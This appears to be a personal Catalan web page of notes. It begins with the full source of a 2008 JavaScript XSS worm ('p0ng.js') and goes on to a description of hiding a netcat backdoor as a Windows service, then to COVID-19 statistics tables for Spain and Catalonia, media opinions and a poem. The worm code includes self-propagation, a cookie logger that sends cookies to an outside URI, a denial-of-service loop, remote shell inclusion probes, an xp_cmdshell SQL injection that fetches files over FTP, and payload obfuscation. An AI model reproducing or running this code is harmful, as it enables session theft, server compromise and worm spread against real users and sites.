/** * @name: +-+-+-+-+-+-+-+-+-+-+-+ P 0 N G ! +-+-+-+-+-+-+-+-+-+-+-+ * @file: p0ng.js * @author: 0x000000, Ronald van den Heetkamp & guests * @func: universal xss worm * @date: 2008.01.07 * **/ /*** string components ***/ String.prototype.urlencode = function(){ return encodeURIComponent(this); } String.prototype.xsplit = function(q,x) { b = this.split(q); return b[x]; } String.prototype.xor = function(n) { x = this; y = n; x ^ y; y = x ^ y; x = x ^ y; return x; } String.prototype.rand = function(n) { n ? n = parseInt(n) : n = 1024; return (Math.floor(Math.random () * n + 1 )); } String.prototype.zeroFill = function(d) { var str = this; while (str.length < d) { str = "0" + str; } return str; } String.prototype.getCharCodes = function() { var codes = []; for(var i=0; i<this.length;i++) { codes.push(this.charCodeAt(i)); } return codes; } String.prototype.toUnicode = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\u' + codes[i].toString(16).zeroFill(4); } return code; } String.prototype.toOctal = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\' + codes[i].toString(8); } return code; } String.prototype.toHex = function() { var code = ''; var codes = this.getCharCodes(); for(var i=0; i<codes.length;i++) { code += '\\x' + codes[i].toString(16); } return code; } /*** array components ***/ Array.prototype.in_array = function(str) { ret = false; for (i=(this.length-1); i>=0; i--) { if (this[i] == str) { ret = true; } } return ret; } /*** worm auto-append component ***/ function worm(uri) { w = document.createElement('script'); uri ? u = uri : u = window.location.href; w.src = u; try { document.getElementsByTagName('head')[0].appendChild(w); } catch(ex) { document.getElementsByTagName('body')[0].appendChild(w); } }; /*** worm XHR object ***/ function xhr() { var xhtp,xml,s; try { xhtp = new XMLHttpRequest(); s=true; } catch(ex) { xml = ['MSXML2.XMLHTTP','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.6.0','MSXML2.XMLHTTP.7.0']; for (i=(xml.length-1) && !s; i>=0; i--) { try { xhtp = new ActiveXObject(xml[i]); s=true; } catch(ex) { s=false; } } } return xhtp; }; Object.prototype.post = function(uri,arg) { /*** usage: xhr().post('foo.php'); ***/ this.open('POST', uri, true); this.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); this.setRequestHeader('Content-length', arg.length); this.setRequestHeader('Connection', 'close'); this.send(arg); }; Object.prototype.get = function(uri,argv) { /*** usage: xhr().get('foo.php'); ***/ this.open('GET',uri,true); this.send (argv); this.onreadystatechange = function () { if (this.readyState == 4) { if (this.status == 200) { var xmlget = this.responseText; } } }; this.send(argv); return xmlget; }; /*** DOM storage component ***/ Object.prototype.domstore = function(url,name,obj) { try { globalStorage[''].name=obj; s=false; } catch(ex) { url? globalStorage[url].name=obj:globalStorage[document.domain].name; sessionStorage.name = obj; s=true; } return s; }; /*** charset information ***/ Object.prototype.charset = function () { document.charset ? c = document.charset: c = false; return c; }; /*** event attach component ***/ Object.prototype.eventer = function(type,listener,useCapture) { try { this.addEventListener(type,listener,useCapture); ret = true; } catch(ex) { var ret = this.attachEvent('on' + type, listener); ret = true; } return ret; }; /*** form submitting component ***/ Object.prototype.fillform = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { xform.elements[i].value = data; } } }; /*** form hiddenfield submitting component ***/ Object.prototype.fillhidden = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { if(xform.elements[i].type == 'hidden') { xform.elements[i].value = data; } } } }; /*** element array component ***/ Object.prototype.elements = function(arg) { var elems =[]; for (i=0;i<arg.length;i++) { var e = arg[i]; e = document.getElementById(e); elems.push(e); } return elems; }; /*** document links component ***/ Object.prototype.links = function() { rl = []; lk = document.links; for(y=0;y<lk.length;++y) { rl.push(lk[y]); } return rl; }; /*** query parts component ***/ Object.prototype.queryparts = function(uri) { k = []; uri?uri=uri:uri=window.location.href; (uri.indexOf('?')==-1)?i=0:i=1; if(i) { //uri = uri.search(/\?/) j = uri.split("&"); for(i=1;i<j.length;i++) { j[i] = j[i].replace(/=(.*)/,''); k.push(j[i]); } } else { k = 0; } return k; }; /*** cookie logger component ***/ Object.prototype.logcookie = function(uri) { var img = document.createElement('img'); document.appendChild(img); img.src = uri + "?c="+escape(document.cookie)+"q="+rand(); }; /*** color calculating component ***/ Object.prototype.visited = function(color) { c = color; if (this.currentStyle) { var x = this.currentStyle['color']; } else if (window.getComputedStyle) { var x = document.defaultView.getComputedStyle(this,null).getPropertyValue('color'); } if(c == x) { res = true; } else { res = false; } return res; }; /*** most clicked links estimater ***/ Object.prototype.estimate = function(color) { var link_array = []; for(i in links()) { if(i.visited(color)) { link_array.push(i); } } return link_array; } /*** denial of service trigger ***/ Object.prototype.dos = function() { this.onfocus = function() {d()} this.onblur = function() {d()} function d() { for(i=0;i<800;i++) { url = window.location.href; uri = document.location = url; if (!uri.closed && url.location) { document.location = url; } } } }; /*** remote shell spawning component ***/ Object.prototype.spawnshell = function(uri) { shell = uri + 'shell.php?'; var gateways = ['base_path','theme_path','cmd','dir','req_path','template','base_path','page', 'systempath','phpbb_root_path','returnpath','inc_dir','include','CONFIG[path]','inc','main_path', 'mosConfig_absolute_path','basepath','configFile']; for(i=0;i<gateways.length;++i) { xhr().get(document.domain + '?',gateways[i] + '=' + shell); } }; /*** hit & run shellspawner ***/ Object.prototype.hitandrun = function(uri) { shell = uri + 'shell.php?'; var gateways = []; var l = links(); for(j = 0; j < l.length; ++j) { gateways.push(queryparts(l[j])) } for(i = 0; i < gateways.length; ++i) { xhr().get(document.domain + '?',gateways[i] + '=' + shell); } }; /*** SQL injecter component pOc ***/ Object.prototype.sqlinject = function(vuln_uri,ftpip) { seq = "1'; exec master..xp_cmdshell 'echo open "+ftpip+" 21 >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo user foo bar >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo get %systemroot%\inetpub\wwwroot\p0ng.js >>"; seq += "%systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo quit >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'ftp -i -n -v -s: %systemroot%\inetpub\wwwroot\p0ng.js';"; try { xhr().get(vuln_uri+seq) } catch(ex) { return false } }; /*** source morphing component ***/ String.prototype.toVariables = function() { var code = this; var operators = ['>','<','&','&&','|','||','%','==','!=','===','!==']; var operator = operators[Math.floor(Math.random()*operators.length)]; var number1 = Math.floor(Math.random()*10); var number2 = Math.floor(Math.random()*10); var statement = number1+operator+number2; var concatStr = ''; if(eval(statement) == true) {concatStr += statement; } else { concatStr += '!' + statement; } concatStr += "?'s1':0"; var customConcat = concatStr; var separateStatements = ','; var variablePrefixes = ['b2_','x2_','$_','x_','s_']; var pos = Math.floor(Math.random()*variablePrefixes.length); var varName = variablePrefixes[pos]; var vector = concatStr; var concatString = ''; for(var i=0; i<code.length;i++) { concatString += (varName + i + '=') + vector.replace("s1", code.charAt(i)) + separateStatements; } concatString += '' + varName + (i++) + '='; for(var i=0; i<code.length;i++) { concatString += (varName + i); if(i + 1 < code.length) { concatString += '+'; } } return concatString; } Object.prototype.morph = function(s) { var source = s; var m = ['unicode','charcodes','octal','hex','urlencode','variables']; var pos=Math.floor(Math.random() * m.length); morphtype = m[pos]; source = morphselection(source,morphtype); return; } switch(morphtype) { case "unicode":source = "eval('"+ source.toUnicode() + "')"; break; case "charcodes":source = 'eval(String.fromCharCode(' + source.getCharCodes() + '))'; break; case "octal":source = "eval('"+ source.toOctal() + "')"; break; case "hex":source = "eval('"+ source.toHex() + "')"; break; case "urlencode":source = "eval(unescape('"+ escape(source) + "'))"; break; case "variables":source = source.toVariables(); break; } return source; }; Object.prototype.morphselection = function(source,morphtype) { switch(morphtype) { case "unicode":source = matchUnicode(source); break; case "octal":source = matchOctal(source); break; case "hex":source = matchHex(source); break; case "urlencode":source = matchUrlencode(source); break; case "charcodes":source = matchCharcodes(source); break; case "variables":source = matchVariables(source); break; } return source; }; Object.prototype.matchVariables = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $2.toVariables() } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $2.toVariables() } ); return source; }; Object.prototype.matchCharcodes = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } ); return source; }; Object.prototype.matchUrlencode = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'unescape(\'' + escape($2) + '\')' } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'unescape("' + escape($2) + '\")' } ); return source; }; Object.prototype.matchOctal = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); return source; }; Object.prototype.matchHex = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); return source; }; Object.prototype.matchUnicode = function(source) { source = source.replace(/(\\[uU][\w\d]{4})?(\w*)([\s(]?)/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); return source; };

URL


Els meus dubtes
Algunes respostes

Adding a new service is the most common technique to disguise backdoors in the Windows operating system. This requires involving tools such as Srvany.exe and Srvinstw.exe that comes with the Resource Kit utility and also with Netcat.exe [1]. The principle of this operation is that the srvany.exe tool is installed as a service and then permits netcat.exe to run as a service. The latter, in turn, listens on an appropriate port for any connection. Once connected, it will have spawned a remote shell on the server (using cmd.exe) and from this moment onwards, a hacker has free reign.

url


Amunt! Top Amunt!
Cryptocurrency miner in browser

Amunt! Top Amunt!
Coses per llegir

Coronavirus COVID-19

wikipedia

Quatre xifres

Espanya

Tenen

URLs : gov.es / BBC :

Date Cases Nous Deaths Nous % (1) source
13/03/2020 6.023 191 3,17
14/03/2020 6.391 196 3,07
15/03/2020 7.753 288 3,71
16/03/2020 11.279 499 4,42
17/03/2020 13.910 623 4,48
18/03/2020 17.395 803 4,62
19/03/2020 20.410 1.043 5,11
20/03/2020 25.374 1.375 5,42
21/03/2020 28.572 1.720 6,02
22/03/2020 33.089 2.182 6,59
23/03/2020 39.673 6.584 2.696 514 6,80 ccma
24/03/2020 47.610 7.937 3.434 738 7,21 bbc
25/03/2020 56.188 8.578 4.089 655 7,27 rtve
26/03/2020 64.059 7.871 4.858 769 7,58 ccma
27/03/2020 72.248 8.189 5.690 832 7,87 isciii
28/03/2020 78.797 6.549 6.528 838 8,28 .
29/03/2020 85.195 6.398 7.340 812 8,61 isciii
30/03/2020 94.417 9.222 8.189 849 8,67 isciii
31/03/2020 102.136 7.719 9.053 864 8,86 isciii
01/04/2020 110.238 8.102 10.003 950 9,07 isciii
02/04/2020 117.710 7.472 10.935 932 9,29 isciii
03/04/2020 124.736 7.026 11.744 809 9,41 isciii
04/04/2020 130.759 6.023 12.418 674 9,49 isciii
05/04/2020 135.032 4.273 13.055 637 9,66 .
06/04/2020 140.510 5.478 13.798 743 9,81 .
07/04/2020 146.690 6.180 14.555 757 9,92 .
08/04/2020 152.446 5.756 15.238 683 9,99 .
09/04/2020 157.022 4.576 15.843 605 10,09 .
10/04/2020 161.852 4.830 16.353 510 10,10 .
11/04/2020 166.019 4.167 16.972 619 10,22 .
12/04/2020 169.495 3.477 17.489 517 10,31 .
13/04/2020 172.541 3.045 18.056 567 10,46 .
14/04/2020 177.633 5.092 18.579 523 10,45 .
15/04/2020 182.816 5.183 19.130 551 10,46 .
16/04/2020 188.068 5.252 19.478 505 10,36 .
17/04/2020 191.726 4.499 20.043 565 10,45 .
18/04/2020 195.944 4.218 20.453 410 10,44 .
19/04/2020 200.210 4.266 20.852 399 10,41 .
20/04/2020 204.178 3.968 21.282 430 10,42 .
21/04/2020 208.389 4.211 21.717 435 10,42 .
22/04/2020 213.024 4.635 22.157 440 . isciii
23/04/2020 215.820 2.796 22.524 367 . .
24/04/2020 218.616 2.796 22.902 378 . .
25/04/2020 220.345 1.729 23.190 288 . .
26/04/2020 222.176 1.831 23.521 331 . rtve
27/04/2020 223.484 1.308 23.822 301 . .
28/04/2020 225.628 2.144 24.147 325 . rtve
29/04/2020 226.937 1.309 24.415 268 . rtve
30/04/2020 . . 24.824 281 .
01/05/2020 216.582/245.567 (2) . 25.100 276 . rtve root, rtve
02/05/2020 217.466 838 25.264 164
03/05/2020 218.011 356 25.428 164
04/05/2020 219.329 867 25.613 185
05/05/2020 220.325 685 25.857 244
06/05/2020 221.447 754 26.070 213
07/05/2020 222.542 1.095 26.299 229
08/05/2020 223.146 604 26.478 179 . rtve
09/05/2020 223.767 621 26.621 143
10/05/2020 224.140 373 26.744 123
11/05/2020 227.436 426 26.867 176
12/05/2020 228.691 439 27.051 184
13/05/2020 229.540 506 27.321 217
14/05/2020 230.183 643 27.459 138 . isciii
15/05/2020 230.698 539 27.563 102 . rtve, rtve
16/05/2020 231.350 421 27.650 87 . rtve
17/05/2020 231.606 285 27.709 59 . rtve
18/05/2020 232.037 295 27.778 83 . rtve
19/05/2020 232.555 . 27.888 . . rtve
20/05/2020 233.037 344 27.970 . . rtve

(1) : morts/cases

(2) confirmados por PCR :
este dato no recoge los casos totales, ya que el Ministerio de Sanidad solo proporciona desde hace una semana los positivos por test PCR. El último dato global de test PCR y test de anticuerpos publicado el sábado 2 de mayo por el Instituto de Salud Carlos III informa de un total de 245.567

Catalunya

Catalunya compta amb aproximadament 600 llits d’UCI, entre llits de crítics i semicrítics, que són fàcilment reconvertibles en crítics. 100 són aportats pels centres privats.

Sagrat Cor (Quiron Salut) : 12 habitualment

Tindrem 35.000 ingressats - el 5 ‰ de 7.000.000

Tindrem 21.000 morts - som 7 milions de catalans i suposem una tassa de mortalitat del 3 ‰ - EFE diu 6 ‰

url

20200405 - url - En les últimes setmanes el sistema sanitari ha fet un gran esforç i ha multiplicat per més de tres les seves capacitats. Ara mateix hi ha 1.939 llits d'UCI a tot el país. D'aquests, 1.500, un 75%, estan ocupats per pacients de Covid-19.

Date Cases Nous Deaths Nous % (1) source
23/03/2020 7.864 1.939 399 94 5,07 ccma
24/03/2020 9.937 2.073 516 177 5,19 ccma
25/03/2020 11.592 1.655 672 156 5,79 .
26/03/2020 12.940 1.348 880 208 6,80 ccma
27/03/2020 14.263 1.324 1.070 190 7,50 ccma + isciii
28/03/2020 15.026 763 1.226 156 8,15 ccma
29/03/2020 16.157 1.131 1.410 184 8,72 isciii
30/03/2020 18.773 2.616 1.672 262 8,90 ccma
31/03/2020 19.991 1.218 1.849 177 9,25 ccma
01/04/2020 21.804 1.813 2.093 244 9,59 ccma
02/04/2020 23.460 1.656 2.335 242 9,95 ccma
03/04/2020 24.734 1.274 2.508 173 10,14 ccma
04/04/2020 26.032 1.298 2.637 129 10,13 ccma
05/04/2020 26.824 792 2.760 123 10,29 ccma
06/04/2020 28.323 1.499 2.908 148 10,27 ccma
07/04/2020 29.647 1.324 3.041 133 10,26 ccma
08/04/2020 31.043 1.396 3.148 107 10,14 ccma
09/04/2020 31.824 781 3.231 83 10,15 ccma
10/04/2020 32.984 1.160 3.331 100 10,10 ccma
11/04/2020 34.027 1.043 3.442 111 10,12 ccma
12/04/2020 34.726 699 3.538 96 10,19 ccma
13/04/2020 35.197 471 3.666 128 10,42 ccma
14/04/2020 36.505 1.308 3.756 90 10,29 ccma
15/04/2020 37.354 849 3.855 99 10,32 ccma
16/04/2020 38.316 962 4.056 201 10,21 ccma
17/04/2020 39.943 1.627 4.123 67 . ccma
18/04/2020 40.600 657 4.336 280 . LV
19/04/2020 41.676 1.076 4.576 240 . ElP
20/04/2020 43.112 1.436 4.904 328 . ccma
21/04/2020 43.802 690 5.080 176 . ccma
22/04/2020 44.892 1.090 5.290 210 . ccma
23/04/2020 45.544 652 5.396 106 .
24/04/2020 46.261 717 5.558 162 . ccma
25/04/2020 47.755 944 5.685 127 . ccma
26/04/2020 48.158 (50.162) 403 (1.074) 5.769 84 . ccma
27/04/2020 48.654 496 (1.510) 5.835 66 . ccma
28/04/2020 48.916 262 5.897 62 . .
29/04/2020 55.137 (PCR) . 5.952 55 . ccma
01/05/2020 57.093 PCR+ . 5.987 35 . ccma
02/05/2020 57.363 270 6.034 47 . ccma
03/05/2020 50.366/57.506 132/143 6.094 60 . ccma
04/05/2020 50.771/58.559 405 6.153 59 .
05/05/2020 50.924 153 6.247 94 . ccma
06/05/2020 51.190 266 6.286 39 . ccma
07/05/2020 60.007 386 6.344 58 . ccma
08/05/2020 60.404 397 6.375 31 . beteve
09/05/2020 60.605 201 6.408 33 . ccma
10/05/2020 60.728 123 6.423 15 . beteve
11/05/2020 60.976 248 6.455 32 . beteve, ccma
12/05/2020 61.355 379 6.485 30 . ccma
13/05/2020 61.677 322 6.510 25 . ccma
14/05/2020 62.615 938 6.536 26 .
15/05/2020 63.114 499 6.557 21 . beteve, ccma
16/05/2020 63.339 225 6.572 15 . ccma
17/05/2020 63.441 102 6.595 23 . ccma
18/05/2020 63.441 -> 60.148 -3.293 (1) 6.614 19 . ccma
19/05/2020 62.978 52 6.385 . . beteve
20/05/2020 63.259 61 6.541 . . .

(1) aquesta dada inferior es deu a un error sistemàtic per part d’un hospital de Barcelona a l’hora de reportar les dades

Com es compten ?

Les xifres de Sanitat, però, només inclouen les defuncions dels casos positius i deixen fora els morts en residències o domicilis als quals no s'ha fet la prova.
És per això que el Ministeri de Justícia ha demanat als registres civils que informin de les llicències d'enterrament fetes des de l'entrada en vigor de l'estat d'alarma per tenir una informació "objectiva i veraç" sobre el nombre de morts per coronavirus.

Compte amb els vellets : ccma

Aixi, el 16/04/2020 es diu : Els morts per coronavirus a Catalunya són gairebé el doble, 7.097, amb el nou recompte de Salut. Aquesta xifra pràcticament duplica la que es coneixia fins ara: aquest dimarts, la dada de defuncions totals era de 3.756. - url

Per països

A dia 9/4 a la url trobo :

Pais Habitants Casos Ratio Morts Ratio
EEUU 327 M 435.160 1,33 15.708 48
Spain 44 M 152.446 3,45 15.238 364
Italy 60 M 139.422 2,3 17.669 294
Germany 83 M 113.422 1,36 2.349 28
France 67 M 112.950 1,67 10.869 162
UK 67 M 84.279 1,26 10.612 158
Portugal 10 M 13.141 1,3 409 40
Mutacions

Uapo : NextStrain - software tool

Dates covid

La seqüencia ha estat

Estadistiques de morts 2020 versus 2019

INE :
Año 2018 - número de defunciones = 427.721

What to do

One of the fastest ways you can profoundly change your life is to rid yourself of toxic people. Bryant McGill.

Compra / Venda on-line

Per comprar directe :

Venda directe

Alfons Duran

En el espacio interior, el más íntimo, merece la pena recuperar los viejos archivos, aquellas lecturas abandonadas, los juegos aplazados, las meditaciones atemporales, los guiños cómplices. Es bueno darse cuenta, en situaciones como ésta, quien de verdad te importa y quién no. Es una perfecta ocasión para hacer un reset en tu vida. No pierdas esta oportunidad.

Habla con tus seres queridos, con tus amigos (los que queden después del cribado), con los vecinos que comparten tus sentimientos. Las tecnologías de la información y la comunicación lo hacen posible. Evita las redes sociales abiertas, donde abunda la basura.

Se muy riguroso con tu acopio de información. De las televisiones generalistas, limítate a los titulares del telenoticias de TV3. Solo a los titulares, a no ser que quieras atragantarte con un completo “televirus”. Mejor al mediodía que por la noche, pues a esa hora conviene relajarse con series inteligentes y amigables como “Friends”. Es el mejor tranquilizante. Una segunda opción es el informativo de Betevé de la tarde, que conduce Xavier Muixí.

Olvídate del paquete del Régimen (la 1, la 2, Antena 3, Telecinco y sus derivadas), a no ser que practiques las fórmulas sado-masoquistas, en cuyo caso espero que lo disfrutes.

Como estás confinado, te ahorras la compra de la prensa de papel. Tienes los digitales, pero has de ser muy autoexigente. Si eres lector asiduo de la caverna mediática madrileña (sin excepciones), te has equivocado al leer esta columna. Para mí son bazofia. Deshecha la Vanguardia y el Periódico, genuinos representantes del españolismo más cutre y provinciano.

Tienes los digitales de el Punt-Avui i el Ara (éste con algunos reparos + JSM + Antoni Bassas). Tienes Vilaweb (del formidable Vicens Partal, con Barnils, Resina y otros) y el Nacional (en el que Josep Antich y su equipo están haciendo un magnífico trabajo). Tienes el Món, la República, L’Unilateral, Nació Digital, Crític y Directa.

Entre los digitales madrileños (asumiendo un cierto sesgo capitalino) tienes Público (y su variante catalana Públic), elDiario.es, Diario16 y nada más. Insisto: nada más, por si tienes algunas dudas.

Historia

La pesta negra va matar dos-cents milions de persones. La pandèmia de la verola en va matar cinquanta-sis. La febre espanyola va matar entre quaranta milions i cinquanta milions de persones, ara fa cent anys. La sida n’ha mortes entre vint-i-cinc i trenta-cinc. De moment hi ha quinze pandèmies que han mort molta més gent que la Covid-19. En canvi, i això és el que crec important, cap no ha tingut els efectes d’aquesta que vivim, la paralització global del planeta.

Esperanza (Alexis Valdes)

Cuando la tormenta pase y se amansen los caminos y seamos sobrevivientes de un naufragio colectivo.
Con el corazón lloroso y el destino bendecido nos sentiremos dichosos tan sólo por estar vivos.
Y le daremos un abrazo al primer desconocido y alabaremos la suerte de conservar un amigo.
Y entonces recordaremos todo aquello que perdimos y de una vez aprenderemos todo lo que no aprendimos.
Ya no tendremos envidia pues todos habrán sufrido. Ya no tendremos desidia seremos más compasivos.
Valdrá más lo que es de todos que lo jamás conseguido. Seremos más generosos y mucho más comprometidos.
Entenderemos lo frágil que significa estar vivos. Sudaremos empatía por quien está y quien se ha ido.
Extrañaremos al viejo que pedía un peso en el mercado, que no supimos su nombre y siempre estuvo a tu lado.
Y quizás el viejo pobre era tu Dios disfrazado. Nunca preguntaste el nombre porque estabas apurado.
Y todo será un milagro Y todo será un legado. Y se respetará la vida, la vida que hemos ganado.
Cuando la tormenta pase te pido Dios, apenado, que nos devuelvas mejores, como nos habías soñado.

Transmision

Los científicos del Instituto alemán de Virología de la universidad de Bonn han concluido que la transmisión más común entre personas se presenta “durante contactos largos y estrechos de multitudes, mientras que el riesgo de contagio mediante el contacto con objetos no es alto, dado que el coronavirus es muy susceptible a la desecación, por lo que no se puede transmitir por el aire”.

covid urls

Al costat de la corona hi ha ...

Corinna


Vist que avui les guerres ja no es fan amb tancs ni canons, potser cal plantejar-se invertir menys en armament i molt més en sanitat i investigació


Links


Ep ! Site under construction. Escriu-me !
Updated 20200406  
Uf !